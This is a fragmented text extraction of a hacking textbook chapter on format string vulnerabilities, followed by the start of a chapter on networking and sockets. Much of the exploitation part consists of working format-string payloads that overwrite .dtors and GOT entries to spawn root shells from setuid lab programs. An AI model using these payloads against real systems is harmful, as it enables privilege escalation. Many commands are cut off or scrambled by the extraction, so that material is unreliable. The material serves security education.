Although format string vulnerabilities aren’t very common anymore, the
following techniques can also be used in other situations
...
They have
been used extensively with functions like printf() in previous programs
...
Each format parameter expects an additional
variable to be passed, so if there are three format parameters in a format
string, there should be three more arguments to the function (in addition
to the format string argument)
...

Ex pl oit a ti on

167

Parameter

Input Type

Output Type

%d

Value

Decimal

%u

Value

Unsigned decimal

%x

Value

Hexadecimal

%s

Pointer

String

%n

Pointer

Number of bytes written so far

The previous chapter demonstrated the use of the more common
format parameters, but neglected the less common %n format parameter
...
c code demonstrates its use
...
c
#include ...
h>
int main() {
int A = 5, B = 7, count_one, count_two;
// Example of a %n format string
printf("The number of bytes written up to this point X%n is being stored in
count_one, and the number of bytes up to here X%n is being stored in
count_two
...

B is %x
...

The following is the output of the program’s compilation and execution
...
c
reader@hacking:~/booksrc $
...
out
The number of bytes written up to this point X is being stored in count_one, and the number of
bytes up to here X is being stored in count_two
...
B is 7
...
When a format
function encounters a %n format parameter, it writes the number of bytes that
have been written by the function to the address in the corresponding function argument
...
The values are then outputted, revealing that 46 bytes
are found before the first %n and 113 before the second
...

B is %x
...
First the value of B, then the
address of A, then the value of A, and finally the address of the format string
...

The format function iterates through the
Top of the Stack
format string one character at a time
...
If a format parameter is encountered,
the appropriate action is taken, using the
Value of B
argument in the stack corresponding to that
Bottom of the Stack
parameter
...

printf("A is %d and is at %08x
...
\n", A, &A);

This can be done in an editor or with a little bit of sed magic
...
c > fmt_uncommon2
...
c fmt_uncommon2
...
B is %x
...
B is %x
...
c
reader@hacking:~/booksrc $
...
out
The number of bytes written up to this point X is being stored in count_one, and the number of
bytes up to here X is being stored in count_two
...
B is b7fd6ff4
...
What the hell is b7fd6ff4? It turns out that since
there wasn’t a value pushed to the stack, the format function just pulled data
from where the third argument should have been (by adding to the current
frame pointer)
...

Ex pl oit a ti on

169

This is an interesting detail that should be remembered
...
Luckily, there is a
fairly common programming mistake that allows for the latter
...
Functionally, this works fine
...
Examples of both methods are
shown in fmt_vuln
...

fmt_vuln
...
h>
#include ...
h>
int main(int argc, char *argv[]) {
char text[1024];
static int test_val = -72;
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(0);
}
strcpy(text, argv[1]);
printf("The right way to print user-controlled input:\n");
printf("%s", text);

printf("\nThe wrong way to print user-controlled input:\n");
printf(text);
printf("\n");
// Debug output
printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val,
test_val);
exit(0);
}

The following output shows the compilation and execution of fmt_vuln
...

reader@hacking:~/booksrc $ gcc -o fmt_vuln fmt_vuln
...
/fmt_vuln
reader@hacking:~/booksrc $ sudo chmod u+s
...
/fmt_vuln testing
The right way to print user-controlled input:
testing

170

0x 300

The wrong way to print user-controlled input:
testing
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

Both methods seem to work with the string testing
...
But as we saw earlier, if the appropriate
function argument isn’t there, adding to the frame pointer will reference a
piece of memory in a preceding stack frame
...
/fmt_vuln testing%x
The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingbffff3e0
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

When the %x format parameter was used, the hexadecimal representation of a four-byte word in the stack was printed
...

reader@hacking:~/booksrc $
...
"x40')
The right way to print user-controlled input:
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...

%08x
...

The wrong way to print user-controlled input:
bffff320
...
00000000
...
3830252e
...
252e7838
...
78383025
...
30252
e78
...
2e783830
...
3830252e
...
252e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e
...
252e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e
...
252e7838
...
78383025
...

[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

This is what the lower stack memory looks like
...
The bytes
0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot
...

reader@hacking:~/booksrc $

As you can see, they’re the memory for the format string itself
...
This fact can be
used to control arguments to the format function
...

Ex pl oit a ti on

171

0x353 Reading from Arbitrary Memory Addresses
The %s format parameter can be used to read from arbitrary memory addresses
...
/fmt_vuln AAAA%08x
...
%08x
...
%08x
...
%08x
The wrong way to print user-controlled input:
AAAAbffff3d0
...
00000000
...
If the fourth
format parameter is %s instead of %x, the format function will attempt to print
the string located at 0x41414141
...
But if a valid memory address
is used, this process could be used to read a string found at that memory
address
...
/getenvaddr PATH
...
/fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x
...
%08x
...
%08x
...
%s
The wrong way to print user-controlled input:
????bffff3d0
...
00000000
...
Since the program name fmt_vuln is two bytes less than
getenvaddr, four is added to the address, and the bytes are reversed due to the
byte ordering
...
Since this address is the address of the PATH environment variable,
it is printed as if a pointer to the environment variable were passed to printf()
...
These format parameters are only needed
to step through memory
...

172

0x 300

0x354 Writing to Arbitrary Memory Addresses
If the %s format parameter can be used to read an arbitrary memory address,
you should be able to use the same technique with %n to write to an arbitrary
memory address
...

The test_val variable has been printing its address and value in the
debug statement of the vulnerable fmt_vuln
...
The test variable is located at 0x08049794, so by using a similar
technique, you should be able to write to the variable
...
/fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x
...
%08x
...
%08x
...
%s
The wrong way to print user-controlled input:
????bffff3d0
...
00000000
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%08x
...
%08x
...
%08x
...
%n
The wrong way to print user-controlled input:
??bffff3d0
...
00000000
...
The resulting value in the test variable depends on the
number of bytes written before the %n
...

reader@hacking:~/booksrc $
...
/fmt_vuln $(printf
The right way to print user-controlled input:
??%x%x%100x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 120 0x00000078
reader@hacking:~/booksrc $
...
/fmt_vuln $(printf
The right way to print user-controlled input:
??%x%x%400x%n

"\x94\x97\x04\x08")%x%x%x%n

"\x94\x97\x04\x08")%x%x%100x%n

"\x94\x97\x04\x08")%x%x%180x%n

"\x94\x97\x04\x08")%x%x%400x%n

Ex pl oit a ti on

173

The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 420 0x000001a4
reader@hacking:~/booksrc $

By manipulating the field-width option of one of the format parameters
before the %n, a certain number of blank spaces can be inserted, resulting in
the output having some blank lines
...
This
approach will work for small numbers, but it won’t work for larger ones, like
memory addresses
...
(Remember
that the least significant byte is actually located in the first byte of the fourbyte word of memory
...

If four writes are done at sequential memory addresses, the least significant
byte can be written to each byte of a four-byte word, as shown here:
Memory
First write to 0x08049794
Second write to 0x08049795
Third write to 0x08049796
Fourth write to 0x08049797
Result

94 95 96
AA 00 00
BB 00
CC

97
00
00 00
00 00 00
DD 00 00 00
AA BB CC DD

As an example, let’s try to write the address 0xDDCCBBAA into the test
variable
...
Four separate writes to the memory addresses
0x08049794, 0x08049795, 0x08049796, and 0x08049797 should accomplish this
...

The first write should be easy
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??%x%x%8x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 28 0x0000001c
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xaa - 28 + 8
$1 = 150
(gdb) quit
reader@hacking:~/booksrc $
...
This is essentially reading a random DWORD from the stack, which
could output anywhere from 1 to 8 characters
...

Now for the next write
...
This argument could be anything; it just has to be four bytes long
and must be located after the first arbitrary memory address of 0x08049754
...
The word JUNK is four bytes long and will work fine
...
This
means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one
...
This is
getting tricky
...
The goal is to have four writes
...
The first
%x format parameter can use the four bytes found before the format string
itself, but the remaining three will need to be supplied data
...

reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $

Ex pl oit a ti on

175

The addresses and junk data at the beginning of the format string changed
the value of the necessary field width option for the %x format parameter
...
Another
way this could have been done is to subtract 24 from the previous field width
value of 150, since 6 new 4-byte words have been added to the front of the
format string
...

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17
reader@hacking:~/booksrc $
...
A hexadecimal calculator quickly shows that 17 more bytes need to be written
before the next %n format parameter
...

This process can be repeated for the third and fourth writes
...
/fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0
4b4e554a
4b4e554a
4b4e554a
[*] test_val @ 0x08049794 = -573785174 0xddccbbaa
reader@hacking:~/booksrc $

By controlling the least significant byte and performing four writes, an
entire address can be written to any memory address
...
This can be quickly explored by statically declaring another
initialized variable called next_val, right after test_val, and also displaying
this value in the debug output
...

176

0x 300

Here, next_val is initialized with the value 0x11111111, so the effect of the
write operations on it will be apparent
...
c > fmt_vuln2
...
c fmt_vuln2
...
c
reader@hacking:~/booksrc $
...
However, next_val is shown to be adjacent to it
...

Last time, a very convenient address of 0xddccbbaa was used
...
But what if an address like 0x0806abcd is used? With this address,
the first byte of 0xCD is easy to write using the %n format parameter by outputting 205 bytes total bytes with a field width of 161
...
It’s easy to
increment the byte counter for the %n format parameter, but it’s impossible
to subtract from it
...
/fmt_vuln2 AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x080497f4 = -72 0xffffffb8
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"
$1 = 200
reader@hacking:~/booksrc $
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x080497f4 = 52 0x00000034
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8"
$1 = 161
reader@hacking:~/booksrc $
...
This technique can be used to wrap around
again and set the least significant byte to 0x06 for the third write
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0
4b4e554a
[*] test_val @ 0x080497f4 = 109517 0x0001abcd
[*] next_val @ 0x080497f8 = 286331136 0x11111100
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab"
$1 = -165
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab"
$1 = 91
reader@hacking:~/booksrc $
...
The wraparound technique seems to be working fine, but
a slight problem manifests itself as the final byte is attempted
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a4b4e554a
[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd
[*] next_val @ 0x080497f8 = 285212674 0x11000002
reader@hacking:~/booksrc $

What happened here? The difference between 0x06 and 0x08 is only two,
but eight bytes are output, resulting in the byte 0x0e being written by the %n
format parameter, instead
...
This problem can be alleviated by simply wrapping around
again; however, it’s good to know the limitations of the field width option
...
/fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
0
4b4e554a
4b4e554a
4b4e554a
[*] test_val @ 0x080497f4 = 134654925 0x0806abcd
[*] next_val @ 0x080497f8 = 285212675 0x11000003
reader@hacking:~/booksrc $

Just like before, the appropriate addresses and junk data are put in the
beginning of the format string, and the least significant byte is controlled for
four write operations to overwrite all four bytes of the variable test_val
...
Also, any additions less than eight may need to be
wrapped around in a similar fashion
...
In the
previous exploits, each of the format parameter arguments had to be
stepped through sequentially
...
In addition, the sequential nature required three
4-byte words of junk to properly write a full address to an arbitrary memory
location
...
For example, %n$d would
access the nth parameter and display it as a decimal number
...
The second
format parameter accesses the fourth parameter and uses a field width option
of 05
...
This method of
direct access eliminates the need to step through memory until the beginning
of the format string is located, since this memory can be accessed directly
...

reader@hacking:~/booksrc $
...
/fmt_vuln AAAA%4\$x
The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

In this example, the beginning of the format string is located at the
fourth parameter argument
...
Since this is being done on the command line and the
dollar sign is a special character, it must be escaped with a backslash
...
The actual format string can be seen when it is printed
correctly
...

Since memory can be accessed directly, there’s no need for four-byte spacers
of junk data to increment the byte output count
...
For practice, let’s use direct parameter access to write a more realistic-looking address of 0xbffffd72 into the
variable test_vals
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
/fmt_vuln $(perl -e 'print "\x94\x97\x04\x08"
...
"\x96\x97\x04\x08"
...
Direct parameter
access is only used for the %n parameters, since it really doesn’t matter what
values are used for the %x spacers
...

0x356 Using Short Writes
Another technique that can simplify format string exploits is using short
writes
...
A more complete description of possible
format parameters can be found in the printf manual page
...

The length modifier
Here, integer conversion stands for d, i, o, u, x, or X conversion
...

This can be used with format string exploits to write two-byte shorts
...
Naturally, direct parameter access can still be used
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = -65515 0xffff0015
reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn
The right way to print user-controlled input:
??%4$hn
The wrong way to print user-controlled input:
??
[*] test_val @ 0x08049794 = 327608 0x0004ffb8
reader@hacking:~/booksrc $

Using short writes, an entire four-byte value can be overwritten with just
two %hn parameters
...

182

0x 300

reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xfd72 - 8
$1 = 64874
(gdb) p 0xbfff - 0xfd72
$2 = -15731
(gdb) p 0x1bfff - 0xfd72
$3 = 49805
(gdb) quit
reader@hacking:~/booksrc $
...
Using short
writes, the order of the writes doesn’t matter, so the first write can be 0xfd72
and the second 0xbfff, if the two passed addresses are swapped in position
...

(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xfd72 - 0xbfff
$2 = 15731
(gdb) quit
reader@hacking:~/booksrc $
...
One option is to overwrite
the return address in the most recent stack frame, as was done with the
stack-based overflows
...
The nature of stack-based
overflows only allows the overwrite of the return address, but format strings
provide the ability to overwrite any memory address, which creates other
possibilities
...
dtors
In binary programs compiled with the GNU C compiler, special table sections
called
...
ctors are made for destructors and constructors, respectively
...
The destructor functions and the
...

A function can be declared as a destructor function by defining the
destructor attribute, as seen in dtors_sample
...

dtors_sample
...
h>
#include ...
\n");
printf("and then when main() exits, the destructor is called
...
\n");
}

In the preceding code sample, the cleanup() function is defined with the
destructor attribute, so the function is automatically called when the main()
function exits, as shown next
...
c
reader@hacking:~/booksrc $
...

and then when main() exits, the destructor is called
...

reader@hacking:~/booksrc $

This behavior of automatically executing a function on exit is controlled by
the
...
This section is an array of 32-bit addresses
terminated by a NULL address
...
Between these two are the
addresses of all the functions that have been declared with the destructor
attribute
...

184

0x 300

reader@hacking:~/booksrc $ nm
...
get_pc_thunk
...
0
080496b0 A _edata
080496b4 A _end
080484b0 T _fini
080484e0 R _fp_hw
0804827c T _init
080482f0 T _start
08048314 t call_gmon_start
080483e8 t cleanup
080496b0 b completed
...
0
08048380 t frame_dummy
080483b4 T main
080496ac d p
...
0
reader@hacking:~/booksrc $

The nm command shows that the cleanup() function is located at 0x080483e8
(shown in bold above)
...
dtors section starts at 0x080495ac
with __DTOR_LIST__ ( ) and ends at 0x080495b4 with __DTOR_END__ ( )
...

The objdump command shows the actual contents of the
...
The first
value of 80495ac is simply showing the address where the
...
Then the actual bytes are shown, opposed to DWORDs, which means
the bytes are reversed
...

reader@hacking:~/booksrc $ objdump -s -j
...
/dtors_sample

...
dtors:
80495ac ffffffff e8830408 00000000
reader@hacking:~/booksrc $

...
dtors section is that it is writable
...
dtors section isn’t
labeled READONLY
...
/dtors_sample

...
interp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

186

0x 300

file format elf32-i386

Size
00000013
CONTENTS,

...
ABI-tag 00000020
CONTENTS,

...
dynsym
00000060
CONTENTS,

...
gnu
...
gnu
...
rel
...
rel
...
init
00000017
CONTENTS,

...
text
000001c0
CONTENTS,

...
rodata
000000bf
CONTENTS,

...
ctors
00000008
CONTENTS,

VMA
LMA
File off
08048114 08048114 00000114
ALLOC, LOAD, READONLY, DATA
08048128 08048128 00000128
ALLOC, LOAD, READONLY, DATA
08048148 08048148 00000148
ALLOC, LOAD, READONLY, DATA
08048174 08048174 00000174
ALLOC, LOAD, READONLY, DATA
080481d4 080481d4 000001d4
ALLOC, LOAD, READONLY, DATA
08048226 08048226 00000226
ALLOC, LOAD, READONLY, DATA
08048234 08048234 00000234
ALLOC, LOAD, READONLY, DATA
08048254 08048254 00000254
ALLOC, LOAD, READONLY, DATA
0804825c 0804825c 0000025c
ALLOC, LOAD, READONLY, DATA
0804827c 0804827c 0000027c
ALLOC, LOAD, READONLY, CODE
08048294 08048294 00000294
ALLOC, LOAD, READONLY, CODE
080482f0 080482f0 000002f0
ALLOC, LOAD, READONLY, CODE
080484b0 080484b0 000004b0
ALLOC, LOAD, READONLY, CODE
080484e0 080484e0 000004e0
ALLOC, LOAD, READONLY, DATA
080485a0 080485a0 000005a0
ALLOC, LOAD, READONLY, DATA
080495a4 080495a4 000005a4
ALLOC, LOAD, DATA

Algn
2**0
2**2
2**2
2**2
2**0
2**1
2**2
2**2
2**2
2**2
2**2
2**4
2**2
2**5
2**2
2**2

16
...
jcr
00000004 080495b8 080495b8 000005b8 2**2
CONTENTS, ALLOC, LOAD, DATA
18
...
got
00000004 08049684 08049684 00000684 2**2
CONTENTS, ALLOC, LOAD, DATA
20
...
plt
0000001c 08049688 08049688 00000688 2**2
CONTENTS, ALLOC, LOAD, DATA
21
...
bss
00000004 080496b0 080496b0 000006b0 2**2
ALLOC
23
...
debug_aranges 00000058 00000000 00000000 000007e0 2**3
CONTENTS, READONLY, DEBUGGING
25
...
debug_info
000001ad 00000000 00000000 0000085d 2**0
CONTENTS, READONLY, DEBUGGING
27
...
debug_line
0000013d 00000000 00000000 00000a70 2**0
CONTENTS, READONLY, DEBUGGING
29
...
debug_ranges 00000048 00000000 00000000 00000c68 2**3
CONTENTS, READONLY, DEBUGGING
reader@hacking:~/booksrc $

Another interesting detail about the
...
This means that the
vulnerable format string program, fmt_vuln
...
dtors section
containing nothing
...

reader@hacking:~/booksrc $ nm
...
dtors
...
/fmt_vuln:

file format elf32-i386

Contents of section
...

As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__
is only four bytes this time, which means there are no addresses between them
...

Ex pl oit a ti on

187

Since the
...
This will be the address of
__DTOR_LIST__ plus four, which is 0x08049694 (which also happens to be the
address of __DTOR_END__ in this case)
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode
...
/getenvaddr SHELLCODE
...
Since the program name lengths of the helper program
getenvaddr
...
c program differ by two bytes, the
shellcode will be located at 0xbffff9ec when fmt_vuln
...
This
address simply has to be written into the
...
In the output below the
short write method is used
...
/fmt_vuln | grep DTOR
08049694 d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $
...
2# whoami
root
sh-3
...
dtors section isn’t properly terminated with a NULL
address of 0x00000000, the shellcode address is still considered to be a destructor
function
...

188

0x 300

0x358 Another notesearch Vulnerability
In addition to the buffer overflow vulnerability, the notesearch program
from Chapter 2 also suffers from a format string vulnerability
...

int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) // If end of file reached,
return 0;
//
return 0
...

note_buffer[note_length] = 0;
// Terminate the string
...

return 1;
}

This function reads the note_buffer from the file and prints the contents
of the note without supplying its own format string
...
In the following output,
the notetaker program is used to create notes to probe memory in the notesearch program
...

reader@hacking:~/booksrc $
...
"x10')
[DEBUG] buffer
@ 0x804a008: 'AAAA%x
...
%x
...
%x
...
%x
...
%x
...
'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch AAAA
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
AAAAbffff750
...
20435455
...
0
...
1
...
252e7825
...

-------[ end of note data ]------reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
dtors section with the address of injected shellcode
...
bin)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9e8
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9e8 - 0xbfff
$2 = 14825
(gdb) quit
reader@hacking:~/booksrc $ nm
...
/notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\
x08")%49143x%8\$hn%14825x%9\$hn
[DEBUG] buffer
@ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch 49143x
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999

21
-------[ end of note data ]------sh-3
...
2#

0x359 Overwriting the Global Offset Table
Since a program could use a function in a shared library many times, it’s
useful to have a table to reference all the functions
...

190

0x 300

This section consists of many jump instructions, each one corresponding to
the address of a function
...

An object dump disassembling the PLT section in the vulnerable format
string program (fmt_vuln
...
plt
...
/fmt_vuln:

file format elf32-i386

Disassembly of section
...

pushl
jmp
add

0x804976c
*0x8049770
%al,(%eax)

080482c8 <__gmon_start__@plt>:
80482c8:
ff 25 74 97 04 08
80482ce:
68 00 00 00 00
80482d3:
e9 e0 ff ff ff

jmp
push
jmp

*0x8049774
$0x0
80482b8 <_init+0x18>

080482d8 <__libc_start_main@plt>:
80482d8:
ff 25 78 97 04 08
80482de:
68 08 00 00 00
80482e3:
e9 d0 ff ff ff

jmp
push
jmp

*0x8049778
$0x8
80482b8 <_init+0x18>

080482e8 :
80482e8:
ff 25 7c 97 04 08
80482ee:
68 10 00 00 00
80482f3:
e9 c0 ff ff ff

jmp
push
jmp

*0x804977c
$0x10
80482b8 <_init+0x18>

080482f8 :
80482f8:
ff 25 80 97 04 08
80482fe:
68 18 00 00 00
8048303:
e9 b0 ff ff ff

jmp
push
jmp

*0x8049780
$0x18
80482b8 <_init+0x18>

jmp
push
jmp

*0x8049784
$0x20
80482b8 <_init+0x18>

08048308 :
8048308:
ff 25 84
804830e:
68 20 00
8048313:
e9 a0 ff
reader@hacking:~/booksrc

97 04 08
00 00
ff ff
$

One of these jump instructions is associated with the exit() function,
which is called at the end of the program
...
Below,
the procedure linking table is shown to be read only
...
/fmt_vuln | grep -A1 "\
...
plt
00000060 080482b8 080482b8 000002b8 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE

But closer examination of the jump instructions (shown in bold below)
reveals that they aren’t jumping to addresses but to pointers to addresses
...

080482f8 :
80482f8:
ff 25 80 97 04 08
80482fe:
68 18 00 00 00
8048303:
e9 b0 ff ff ff

jmp
push
jmp

*0x8049780
$0x18
80482b8 <_init+0x18>

08048308 :
8048308:
ff 25 84 97 04 08
804830e:
68 20 00 00 00
8048313:
e9 a0 ff ff ff

jmp
push
jmp

*0x8049784
$0x20
80482b8 <_init+0x18>

These addresses exist in another section, called the global offset table (GOT),
which is writable
...

reader@hacking:~/booksrc $ objdump -R
...
/fmt_vuln:

file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE
08049764 R_386_GLOB_DAT
08049774 R_386_JUMP_SLOT
08049778 R_386_JUMP_SLOT
0804977c R_386_JUMP_SLOT
08049780 R_386_JUMP_SLOT
08049784 R_386_JUMP_SLOT

VALUE
__gmon_start__
__gmon_start__
__libc_start_main
strcpy
printf
exit

reader@hacking:~/booksrc $

This reveals that the address of the exit() function (shown in bold above)
is located in the GOT at 0x08049784
...

As usual, the shellcode is put in an environment variable, its actual
location is predicted, and the format string vulnerability is used to write the
value
...
The calculations for the %x format parameters will be done

192

0x 300

once again for clarity
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode
...
/getenvaddr SHELLCODE
...
/fmt_vuln

...
/fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\
x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????

b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3
...
2#

When fmt_vuln
...
Since
the actual address has been switched with the address for the shellcode in the
environment, a root shell is spawned
...

The ability to overwrite any arbitrary address opens up many possibilities
for exploitation
...

Ex pl oit a ti on

193

0x400
NETWORKING

Communication and language have greatly enhanced
the abilities of the human race
...
Similarly,
programs can become much more powerful when they have the ability to
communicate with other programs via a network
...

Networking is so prevalent that it is sometimes taken for granted
...
Each of these applications relies on a particular network protocol, but
each protocol uses the same general network transport methods
...
In this chapter you will learn how to network your applications using sockets and how to deal with common network vulnerabilities
...
The structure of this language is described in layers by the OSI model
...
The OSI model is broken down into conceptual
layers of communication
...
The seven OSI layers are as follows:
Physical layer This layer deals with the physical connection between
two points
...
This layer is also responsible for activating, maintaining,
and deactivating these bit-stream communications
...
In contrast with the physical layer, which takes care of sending the raw bits, this layer provides high-level functions, such as error
correction and flow control
...

Network layer This layer works as a middle ground; its primary role is
to pass information between the lower and the higher layers
...

Transport layer This layer provides transparent transfer of data between
systems
...

Session layer This layer is responsible for establishing and maintaining
connections between network applications
...
This allows for
things like encryption and data compression
...

When data is communicated through these protocol layers, it’s sent in
small pieces called packets
...
Starting from the application layer, the packet wraps the presentation layer around that data, which wraps the session layer, which wraps
the transport layer, and so forth
...
Each
wrapped layer contains a header and a body
...
The body of one layer contains the entire package of previously
encapsulated layers, like the skin of an onion or the functional contexts
found on a program’s stack
...
The next later is the data link layer
...
This
protocol allows for communication between Ethernet ports, but these ports
don’t yet have IP addresses
...
In addition to addressing, this layer is
responsible for moving data from one address to another
...
The next layer is the transport layer, which for web traffic is
TCP; it provides a seamless bidirectional socket connection
...

Other addressing schemes exist at this layer; however, your web traffic
probably uses IP version 4 (IPv4)
...
XX
...
XX
...
Since IPv4 is most common, IP will always
refer to IPv4 in this book
...
When you browse the
Web, the web browser on your network is communicating across the Internet
with the webserver located on a different private network
...
Since the router isn’t concerned with what’s actually in
the packets, it only needs to implement protocols up to the network layer
...
This router then encapsulates this packet with the lowerlayer protocol headers needed for the packet to reach its final destination
...

Network 1
application

Internet

Network 2
application

(7) Application layer
(6) Presentation layer
(5) Session layer
(4) Transport layer
(3) Network layer
(2) Data-link layer
(1) Physical layer

N et wor kin g

197

All of this packet encapsulation makes up a complex language that hosts
on the Internet (and other types of networks) use to communicate with each
other
...
Programs that use
networking, such as web browsers and email clients, need to interface with
the operating system which handles the network communications
...

0x420

Sockets
A socket is a standard way to perform network communication through the
OS
...
But these sockets are just a programmer’s
abstraction that takes care of all the nitty-gritty details of the OSI model
described above
...
This data is transmitted at the session layer (5), above
the lower layers (handled by the operating system), which take care of
routing
...
The most common types are stream
sockets and datagram sockets
...
One side initiates the connection to the
other, and after the connection is established, either side can communicate
to the other
...
Stream sockets use a standard communication protocol called Transmission Control Protocol (TCP), which exists on
the transport layer (4) of the OSI model
...
TCP is designed so that the
packets of data will arrive without errors and in sequence, like words
arriving at the other end in the order they were spoken when you are
talking on the telephone
...

Another common type of socket is a datagram socket
...

The connection is one-way only and unreliable
...
The postal service is pretty reliable; the Internet, however, is not
...
UDP stands for User Datagram
